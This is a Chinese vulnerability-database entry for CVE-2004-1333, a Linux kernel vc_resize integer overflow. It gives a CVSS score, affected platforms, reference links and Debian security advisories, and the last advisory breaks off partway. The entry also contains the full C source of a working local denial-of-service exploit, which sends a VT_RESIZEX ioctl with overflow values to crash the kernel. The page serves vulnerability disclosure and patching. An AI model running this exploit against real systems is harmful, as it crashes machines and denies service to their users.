CVE-2004-1333
CVSS2.1
发布时间 :2004-12-15 00:00:00
修订时间 :2016-11-18 21:59:19
NMCOEP    

[原文]Integer overflow in the vc_resize function in the Linux kernel 2.4 and 2.6 before 2.6.10 allows local users to cause a denial of service (kernel crash) via a short new screen value, which leads to a buffer overflow.


[CNNVD]Linux Kernel多个本地漏洞(CNNVD-200412-062)

        Linux kernel 2.6.10以前的2.4和2.6版本中vc_resize函数存在整数溢出漏洞。本地用户借助超短新屏幕值导致服务拒绝,从而引发缓冲区溢出漏洞。
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:linux:linux_kernel:2.4.21:pre7Linux Kernel 2.4.21 pre7
cpe:/o:linux:linux_kernel:2.4.23:pre9Linux Kernel 2.4.23 pre9
cpe:/o:redhat:fedora_core:core_2.0
cpe:/o:linux:linux_kernel:2.4.21:pre1Linux Kernel 2.4.21 pre1
cpe:/o:linux:linux_kernel:2.6.6:rc1Linux Kernel 2.6.6 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.27:pre5Linux Kernel 2.4.27 pre5
cpe:/o:linux:linux_kernel:2.6.7:rc1Linux Kernel 2.6.7 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.27:pre4Linux Kernel 2.4.27 pre4
cpe:/o:redhat:linux:7.3::i686
cpe:/o:linux:linux_kernel:2.4.27:pre3Linux Kernel 2.4.27 pre3
cpe:/o:linux:linux_kernel:2.6.9:2.6.20
cpe:/o:linux:linux_kernel:2.6.8:rc2Linux Kernel 2.6.8 Release Candidate 2
cpe:/o:linux:linux_kernel:2.4.27:pre2Linux Kernel 2.4.27 pre2
cpe:/o:linux:linux_kernel:2.4.27:pre1Linux Kernel 2.4.27 pre1
cpe:/o:linux:linux_kernel:2.6.1:rc2Linux Kernel 2.6.1 Release Candidate 2
cpe:/o:linux:linux_kernel:2.6.1:rc1Linux Kernel 2.6.1 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.0:test7Linux Kernel 2.4.0 test7
cpe:/o:linux:linux_kernel:2.4.0:test9Linux Kernel 2.4.0 test9
cpe:/o:linux:linux_kernel:2.4.0:test6Linux Kernel 2.4.0 test6
cpe:/o:linux:linux_kernel:2.4.0:test1Linux Kernel 2.4.0 test1
cpe:/o:linux:linux_kernel:2.4.17Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.6.8:rc1Linux Kernel 2.6.8 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.18Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.6.8:rc3Linux Kernel 2.6.8 Release Candidate 3
cpe:/o:linux:linux_kernel:2.4.13Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.4.14Linux Kernel 2.4.14
cpe:/o:linux:linux_kernel:2.4.19Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.4.15Linux Kernel 2.4.15
cpe:/o:linux:linux_kernel:2.4.16Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.21:pre4Linux Kernel 2.4.21 pre4
cpe:/o:linux:linux_kernel:2.4.23_ow2
cpe:/o:linux:linux_kernel:2.6.6Linux Kernel 2.6.6
cpe:/o:linux:linux_kernel:2.6.7Linux Kernel 2.6.7
cpe:/o:linux:linux_kernel:2.4.10Linux Kernel 2.4.10
cpe:/o:redhat:linux:7.3::i386
cpe:/o:linux:linux_kernel:2.4.11Linux Kernel 2.4.11
cpe:/o:linux:linux_kernel:2.4.12Linux Kernel 2.4.12
cpe:/o:linux:linux_kernel:2.4.28Linux Kernel 2.4.28
cpe:/o:linux:linux_kernel:2.4.24Linux Kernel 2.4.24
cpe:/o:linux:linux_kernel:2.6.0:test5Linux Kernel 2.6 test5
cpe:/o:linux:linux_kernel:2.4.25Linux Kernel 2.4.25
cpe:/o:linux:linux_kernel:2.6.0:test2Linux Kernel 2.6 test2
cpe:/o:linux:linux_kernel:2.6.0:test4Linux Kernel 2.6 test4
cpe:/o:linux:linux_kernel:2.6.0:test9Linux Kernel 2.6 test9
cpe:/o:linux:linux_kernel:2.6.4Linux Kernel 2.6.4
cpe:/o:linux:linux_kernel:2.6.0:test6Linux Kernel 2.6 test6
cpe:/o:linux:linux_kernel:2.6.5Linux Kernel 2.6.5
cpe:/o:redhat:fedora_core:core_1.0
cpe:/o:linux:linux_kernel:2.4.26Linux Kernel 2.4.26
cpe:/o:linux:linux_kernel:2.6.0:test3Linux Kernel 2.6 test3
cpe:/o:linux:linux_kernel:2.4.27Linux Kernel 2.4.27
cpe:/o:linux:linux_kernel:2.6.0:test8Linux Kernel 2.6 test8
cpe:/o:linux:linux_kernel:2.6.8Linux Kernel 2.6.8
cpe:/o:linux:linux_kernel:2.6.0:test7Linux Kernel 2.6 test7
cpe:/o:linux:linux_kernel:2.4.18:pre6Linux Kernel 2.4.18 pre6
cpe:/o:linux:linux_kernel:2.4.18:pre5Linux Kernel 2.4.18 pre5
cpe:/o:linux:linux_kernel:2.4.18:pre4Linux Kernel 2.4.18 pre4
cpe:/o:linux:linux_kernel:2.4.19:pre5Linux Kernel 2.4.19 pre5
cpe:/o:linux:linux_kernel:2.4.18::x86
cpe:/o:linux:linux_kernel:2.4.18:pre3Linux Kernel 2.4.18 pre3
cpe:/o:linux:linux_kernel:2.4.19:pre3Linux Kernel 2.4.19 pre3
cpe:/o:linux:linux_kernel:2.4.20Linux Kernel 2.4.20
cpe:/o:linux:linux_kernel:2.4.0:test12Linux Kernel 2.4.0 test12
cpe:/o:linux:linux_kernel:2.4.19:pre6Linux Kernel 2.4.19 pre6
cpe:/o:linux:linux_kernel:2.4.21Linux Kernel 2.4.21
cpe:/o:linux:linux_kernel:2.4.18:pre8Linux Kernel 2.4.18 pre8
cpe:/o:linux:linux_kernel:2.4.0:test10Linux Kernel 2.4.0 test10
cpe:/o:linux:linux_kernel:2.4.18:pre7Linux Kernel 2.4.18 pre7
cpe:/o:linux:linux_kernel:2.4.19:pre4Linux Kernel 2.4.19 pre4
cpe:/o:linux:linux_kernel:2.4.0:test11Linux Kernel 2.4.0 test11
cpe:/o:linux:linux_kernel:2.4.22Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.4.23Linux Kernel 2.4.23
cpe:/o:linux:linux_kernel:2.4.18:pre2Linux Kernel 2.4.18 pre2
cpe:/o:linux:linux_kernel:2.4.18:pre1Linux Kernel 2.4.18 pre1
cpe:/o:linux:linux_kernel:2.4.19:pre1Linux Kernel 2.4.19 pre1
cpe:/o:linux:linux_kernel:2.6.2Linux Kernel 2.6.2
cpe:/o:linux:linux_kernel:2.6.3Linux Kernel 2.6.3
cpe:/o:linux:linux_kernel:2.6.0Linux Kernel 2.6.0
cpe:/o:linux:linux_kernel:2.4.19:pre2Linux Kernel 2.4.19 pre2
cpe:/o:linux:linux_kernel:2.6.1Linux Kernel 2.6.1
cpe:/o:redhat:linux:7.3Red Hat Linux 7.3
cpe:/o:linux:linux_kernel:2.6.0:test1Linux Kernel 2.6 test1
cpe:/o:redhat:fedora_core:core_3.0
cpe:/o:linux:linux_kernel:2.4.8Linux Kernel 2.4.8
cpe:/o:linux:linux_kernel:2.4.9Linux Kernel 2.4.9
cpe:/o:linux:linux_kernel:2.4.24_ow1
cpe:/o:redhat:linux:9.0::i386
cpe:/o:linux:linux_kernel:2.4.6Linux Kernel 2.4.6
cpe:/o:linux:linux_kernel:2.4.0:test4Linux Kernel 2.4.0 test4
cpe:/o:linux:linux_kernel:2.4.7Linux Kernel 2.4.7
cpe:/o:linux:linux_kernel:2.4.0:test3Linux Kernel 2.4.0 test3
cpe:/o:linux:linux_kernel:2.6_test9_cvs
cpe:/o:linux:linux_kernel:2.4.0:test8Linux Kernel 2.4.0 test8
cpe:/o:linux:linux_kernel:2.4.0:test5Linux Kernel 2.4.0 test5
cpe:/o:linux:linux_kernel:2.6.10:rc2Linux Kernel 2.6.10 Release Candidate 2
cpe:/o:linux:linux_kernel:2.4.0:test2Linux Kernel 2.4.0 test2
cpe:/o:linux:linux_kernel:2.6.0:test11Linux Kernel 2.6 test11
cpe:/o:linux:linux_kernel:2.6.0:test10Linux Kernel 2.6 test10
cpe:/o:linux:linux_kernel:2.4.4Linux Kernel 2.4.4
cpe:/o:linux:linux_kernel:2.4.5Linux Kernel 2.4.5
cpe:/o:linux:linux_kernel:2.4.2Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.4.3Linux Kernel 2.4.3
cpe:/o:linux:linux_kernel:2.4.0Linux Kernel 2.4.0
cpe:/o:linux:linux_kernel:2.4.1Linux Kernel 2.4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1333
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1333
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-062
(官方数据源) CNNVD

- 其它链接及资源

http://www.debian.org/security/2006/dsa-1067
(UNKNOWN)  DEBIAN  DSA-1067
http://www.debian.org/security/2006/dsa-1069
(UNKNOWN)  DEBIAN  DSA-1069
http://www.debian.org/security/2006/dsa-1070
(UNKNOWN)  DEBIAN  DSA-1070
http://www.debian.org/security/2006/dsa-1082
(UNKNOWN)  DEBIAN  DSA-1082
http://www.guninski.com/where_do_you_want_billg_to_go_today_2.html
(VENDOR_ADVISORY)  MISC  http://www.guninski.com/where_do_you_want_billg_to_go_today_2.html
http://www.mandriva.com/security/advisories?name=MDKSA-2005:218
(UNKNOWN)  MANDRAKE  MDKSA-2005:218
http://www.novell.com/linux/security/advisories/2005_18_kernel.html
(VENDOR_ADVISORY)  SUSE  SUSE-SA:2005:018
http://www.securityfocus.com/bid/11956
(VENDOR_ADVISORY)  BID  11956
http://www.ubuntulinux.org/support/documentation/usn/usn-47-1
(VENDOR_ADVISORY)  UBUNTU  USN-47-1
http://xforce.iss.net/xforce/xfdb/18523
(VENDOR_ADVISORY)  XF  linux-vcresize-dos(18523)
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=152532
(VENDOR_ADVISORY)  FEDORA  FLSA:152532

- 漏洞信息

Linux Kernel多个本地漏洞
低危 缓冲区溢出
2004-12-15 00:00:00 2010-04-02 00:00:00
本地  
        Linux kernel 2.6.10以前的2.4和2.6版本中vc_resize函数存在整数溢出漏洞。本地用户借助超短新屏幕值导致服务拒绝,从而引发缓冲区溢出漏洞。
        

- 公告与补丁

        Reportedly, these vulnerabilities are addressed in versions 2.6.10rc3bk5 and 2.4rc of the Linux kernel, but this is not confirmed.
        Please see the referenced advisories for more information.
        RedHat Fedora Core1
        
        
        Linux kernel 2.4.17
        

- 漏洞信息 (690)

Linux Kernel <= 2.6.9, <= 2.4.28 vc_resize int Local Overflow Exploit (EDBID:690)
linux dos
2004-12-16 Verified
0 Georgi Guninski
N/A [点击下载]
/* vc_resize int overflow
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases
 * */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/vt.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>

int main(int ac, char **av)
{
int fd;
struct vt_consize vv;
int cou=4242;

fd=open("/dev/tty",O_RDWR);
if (fd<0) {perror("open");return -42;}
memset(&vv,0,sizeof(vv));
vv.v_clin=0;
vv.v_vcol=0;
vv.v_ccol=0;

/* magic values, overflow on i386*/
vv.v_rows=65535;
vv.v_cols=32769;

system("sync");
if (ioctl(fd,VT_RESIZEX,&vv) < 0) {perror("ioctl");return -4242;}
while(cou--) printf(";)\n");
close(fd);
return 42;
}

// milw0rm.com [2004-12-16]
		

- 漏洞信息 (F46509)

Debian Linux Security Advisory 1070-1 (PacketStormID:F46509)
2006-05-22 00:00:00
Debian,Dann Frazier  debian.org
advisory,remote,denial of service,arbitrary,kernel,local,vulnerability
linux,debian
CVE-2004-0427,CVE-2005-0489,CVE-2004-0394,CVE-2004-0447,CVE-2004-0554,CVE-2004-0565,CVE-2004-0685,CVE-2005-0001,CVE-2004-0883,CVE-2004-0949,CVE-2004-1016,CVE-2004-1333,CVE-2004-0997,CVE-2004-1335,CVE-2004-1017,CVE-2005-0124,CVE-2005-0528,CVE-2003-0984
[点击下载]

Debian Security Advisory 1070-1 - Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1070-1                    security@debian.org
http://www.debian.org/security/               Martin Schulze, Dann Frazier
May 21th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : kernel-source-2.4.19,kernel-image-sparc-2.4,kernel-patch-2.4.19-mips
Vulnerability  : several
Problem-Type   : local/remote
Debian-specific: no
CVE IDs        : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685  CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135

Several local and remote vulnerabilities have been discovered in the Linux
kernel that may lead to a denial of service or the execution of arbitrary
code. The Common Vulnerabilities and Exposures project identifies the
following problems:


 CVE-2004-0427

     A local denial of service vulnerability in do_fork() has been found.     

 CVE-2005-0489

     A local denial of service vulnerability in proc memory handling has
     been found.

 CVE-2004-0394

     A buffer overflow in the panic handling code has been found.

 CVE-2004-0447

     A local denial of service vulnerability through a null pointer
     dereference in the IA64 process handling code has been found.

 CVE-2004-0554

     A local denial of service vulnerability through an infinite loop in
     the signal handler code has been found.

 CVE-2004-0565

     An information leak in the context switch code has been found on
     the IA64 architecture.

 CVE-2004-0685

     Unsafe use of copy_to_user in USB drivers may disclose sensitive
     information.

 CVE-2005-0001

     A race condition in the i386 page fault handler may allow privilege
     escalation.

 CVE-2004-0883

     Multiple vulnerabilities in the SMB filesystem code may allow denial
     of service of information disclosure.

 CVE-2004-0949

     An information leak discovered in the SMB filesystem code.

 CVE-2004-1016

     A local denial of service vulnerability has been found in the SCM layer.

 CVE-2004-1333

     An integer overflow in the terminal code may allow a local denial of
     service vulnerability.

 CVE-2004-0997

     A local privilege escalation in the MIPS assembly code has been found.
 
 CVE-2004-1335
 
     A memory leak in the ip_options_get() function may lead to denial of
     service.
      
 CVE-2004-1017

     Multiple overflows exist in the io_edgeport driver which might be usable
     as a denial of service attack vector.
 
 CVE-2005-0124

     Bryan Fulton reported a bounds checking bug in the coda_pioctl function
     which may allow local users to execute arbitrary code or trigger a denial
     of service attack.

 CVE-2005-0528

     A local privilege escalation in the mremap function has been found

 CVE-2003-0984

     Inproper initialization of the RTC may disclose information.

 CVE-2004-1070

     Insufficient input sanitising in the load_elf_binary() function may
     lead to privilege escalation.

 CVE-2004-1071

     Incorrect error handling in the binfmt_elf loader may lead to privilege
     escalation.

 CVE-2004-1072

     A buffer overflow in the binfmt_elf loader may lead to privilege
     escalation or denial of service.

 CVE-2004-1073

     The open_exec function may disclose information.

 CVE-2004-1074

     The binfmt code is vulnerable to denial of service through malformed
     a.out binaries.

 CVE-2004-0138

     A denial of service vulnerability in the ELF loader has been found.

 CVE-2004-1068

     A programming error in the unix_dgram_recvmsg() function may lead to
     privilege escalation.

 CVE-2004-1234

     The ELF loader is vulnerable to denial of service through malformed
     binaries.

 CVE-2005-0003

     Crafted ELF binaries may lead to privilege escalation, due to 
     insufficient checking of overlapping memory regions.

 CVE-2004-1235

     A race condition in the load_elf_library() and binfmt_aout() functions
     may allow privilege escalation.

 CVE-2005-0504

     An integer overflow in the Moxa driver may lead to privilege escalation.

 CVE-2005-0384

     A remote denial of service vulnerability has been found in the PPP
     driver.

 CVE-2005-0135

     An IA64 specific local denial of service vulnerability has been found
     in the unw_unwind_to_user() function.

The following matrix explains which kernel version for which architecture
fix the problems mentioned above:

                                     Debian 3.0 (woody)
     Source                          2.4.19-4
     Sun Sparc architecture          26woody1
     Little endian MIPS architecture 0.020911.1.woody5


We recommend that you upgrade your kernel package immediately and reboot
the machine.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get dist-upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc
      Size/MD5 checksum:      692 27f44a0eec5837b0b01d26c6cff392be
    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz
      Size/MD5 checksum:    27768 6c719a6343c9ea0dad44a736b3842504
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc
      Size/MD5 checksum:      792 d7c89c90fad77944ca1c5a18327f31dd
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz
      Size/MD5 checksum:  1013866 21b4b677a7a319442c8fe8a4c72eb4c2
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc
      Size/MD5 checksum:      672 4c353db091e8edc4395e46cf8d39ec42
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz
      Size/MD5 checksum:    71071 7012adde9ba9a573e1be66f0d258721a
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz
      Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da

  Architecture independent components:

    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb
      Size/MD5 checksum:  1521850 75d23c7c54094b1d25d3b708fd644407
    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb
      Size/MD5 checksum:  1547874 c6881b25e3a5967e0f6f9c351fb88962
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb
      Size/MD5 checksum:  1014564 0e89364c2816f5f4519256a8ea367ab6
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb
      Size/MD5 checksum:  1785490 c66cef9e87d9a89caeee02af31e3c96d
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb
      Size/MD5 checksum: 25902158 321403201a198371fd55c9b8ac4583f7

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb
      Size/MD5 checksum:  3923058 db7bbd997410667bec4ac713d81d60ea
    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb
      Size/MD5 checksum:  4044796 106fcb86485531d96b4fdada61b71405
    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb
      Size/MD5 checksum:  3831424 347b0c290989f0cc99f3b336c156f61d
    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb
      Size/MD5 checksum:  3952220 f7dd8326c0ae0b0dee7c46e24023d0a2

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb
      Size/MD5 checksum:  3890804 7348a8cd3961190aa2a19f562c96fe2f
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb
      Size/MD5 checksum:  2080618 d52d00e7097ae0c8f4ccb6f34656361d
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb
      Size/MD5 checksum:  2080830 db7141d3c0d86a43659176f974599cc2
    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb
      Size/MD5 checksum:    15816 c31e3b72d6eac6f3f99f75ea838e0bf9

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEcAc/Xm3vHE4uyloRAtGHAJoC9+1ELp5vTYgL4SDsNOIndI5rqQCePabu
rmancVBp6F2Nfh1PHQQrOTk=
=7GeM
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F46508)

Debian Linux Security Advisory 1069-1 (PacketStormID:F46508)
2006-05-22 00:00:00
Debian,Dann Frazier  debian.org
advisory,remote,denial of service,arbitrary,kernel,local,vulnerability
linux,debian
CVE-2004-0427,CVE-2005-0489,CVE-2004-0394,CVE-2004-0447,CVE-2004-0554,CVE-2004-0565,CVE-2004-0685,CVE-2005-0001,CVE-2004-0883,CVE-2004-0949,CVE-2004-1016,CVE-2004-1333,CVE-2004-0997,CVE-2004-1335,CVE-2004-1017,CVE-2005-0124,CVE-2005-0528,CVE-2003-0984
[点击下载]

Debian Security Advisory 1069-1 - Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1069-1                    security@debian.org
http://www.debian.org/security/               Martin Schulze, Dann Frazier
May 20th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : kernel-source-2.4.18,kernel-image-2.4.18-1-alpha,kernel-image-2.4.18-1-i386,kernel-image-2.4.18-hppa,kernel-image-2.4.18-powerpc-xfs,kernel-patch-2.4.18-powerpc,kernel-patch-benh
Vulnerability  : several
Problem-Type   : local/remote
Debian-specific: no
CVE IDs        : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685  CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135

Several local and remote vulnerabilities have been discovered in the Linux
kernel that may lead to a denial of service or the execution of arbitrary
code. The Common Vulnerabilities and Exposures project identifies the
following problems:


 CVE-2004-0427

     A local denial of service vulnerability in do_fork() has been found.     

 CVE-2005-0489

     A local denial of service vulnerability in proc memory handling has
     been found.

 CVE-2004-0394

     A buffer overflow in the panic handling code has been found.

 CVE-2004-0447

     A local denial of service vulnerability through a null pointer
     dereference in the IA64 process handling code has been found.

 CVE-2004-0554

     A local denial of service vulnerability through an infinite loop in
     the signal handler code has been found.

 CVE-2004-0565

     An information leak in the context switch code has been found on
     the IA64 architecture.

 CVE-2004-0685

     Unsafe use of copy_to_user in USB drivers may disclose sensitive
     information.

 CVE-2005-0001

     A race condition in the i386 page fault handler may allow privilege
     escalation.

 CVE-2004-0883

     Multiple vulnerabilities in the SMB filesystem code may allow denial
     of service of information disclosure.

 CVE-2004-0949

     An information leak discovered in the SMB filesystem code.

 CVE-2004-1016

     A local denial of service vulnerability has been found in the SCM layer.

 CVE-2004-1333

     An integer overflow in the terminal code may allow a local denial of
     service vulnerability.

 CVE-2004-0997

     A local privilege escalation in the MIPS assembly code has been found.
 
 CVE-2004-1335
 
     A memory leak in the ip_options_get() function may lead to denial of
     service.
      
 CVE-2004-1017

     Multiple overflows exist in the io_edgeport driver which might be usable
     as a denial of service attack vector.
 
 CVE-2005-0124

     Bryan Fulton reported a bounds checking bug in the coda_pioctl function
     which may allow local users to execute arbitrary code or trigger a denial
     of service attack.

 CVE-2005-0528

     A local privilege escalation in the mremap function has been found

 CVE-2003-0984

     Inproper initialization of the RTC may disclose information.

 CVE-2004-1070

     Insufficient input sanitising in the load_elf_binary() function may
     lead to privilege escalation.

 CVE-2004-1071

     Incorrect error handling in the binfmt_elf loader may lead to privilege
     escalation.

 CVE-2004-1072

     A buffer overflow in the binfmt_elf loader may lead to privilege
     escalation or denial of service.

 CVE-2004-1073

     The open_exec function may disclose information.

 CVE-2004-1074

     The binfmt code is vulnerable to denial of service through malformed
     a.out binaries.

 CVE-2004-0138

     A denial of service vulnerability in the ELF loader has been found.

 CVE-2004-1068

     A programming error in the unix_dgram_recvmsg() function may lead to
     privilege escalation.

 CVE-2004-1234

     The ELF loader is vulnerable to denial of service through malformed
     binaries.

 CVE-2005-0003

     Crafted ELF binaries may lead to privilege escalation, due to 
     insufficient checking of overlapping memory regions.

 CVE-2004-1235

     A race condition in the load_elf_library() and binfmt_aout() functions
     may allow privilege escalation.

 CVE-2005-0504

     An integer overflow in the Moxa driver may lead to privilege escalation.

 CVE-2005-0384

     A remote denial of service vulnerability has been found in the PPP
     driver.

 CVE-2005-0135

     An IA64 specific local denial of service vulnerability has been found
     in the unw_unwind_to_user() function.

The following matrix explains which kernel version for which architecture
fix the problems mentioned above:

                                     Debian 3.0 (woody)
     Source                          2.4.18-14.4
     Alpha architecture              2.4.18-15woody1
     Intel IA-32 architecture        2.4.18-13.2
     HP Precision architecture       62.4 
     PowerPC architecture            2.4.18-1woody6
     PowerPC architecture/XFS        20020329woody1            
     PowerPC architecture/benh       20020304woody1
     Sun Sparc architecture          22woody1    

We recommend that you upgrade your kernel package immediately and reboot
the machine.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get dist-upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEb9YGXm3vHE4uyloRAkhXAJ0e1RmUxVZSbQICFa/j07oKPfWRVwCeMrhj
wYGegwosZg6xi3oI77opLQY=
=eu/T
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F46506)

Debian Linux Security Advisory 1067-1 (PacketStormID:F46506)
2006-05-22 00:00:00
Debian,Dann Frazier  debian.org
advisory,remote,denial of service,arbitrary,kernel,local,vulnerability
linux,debian
CVE-2004-0427,CVE-2005-0489,CVE-2004-0394,CVE-2004-0447,CVE-2004-0554,CVE-2004-0565,CVE-2004-0685,CVE-2005-0001,CVE-2004-0883,CVE-2004-0949,CVE-2004-1016,CVE-2004-1333,CVE-2004-0997,CVE-2004-1335,CVE-2004-1017,CVE-2005-0124,CVE-2005-0528,CVE-2003-0984
[点击下载]

Debian Security Advisory 1067-1 - Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1067-1                    security@debian.org
http://www.debian.org/security/               Martin Schulze, Dann Frazier
May 20th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : kernel-source-2.4.16,kernel-image-2.4.16-lart,kernel-image-2.4.16-riscpc,kernel-image-2.4.16-netwinder
Vulnerability  : several
Problem-Type   : local/remote
Debian-specific: no
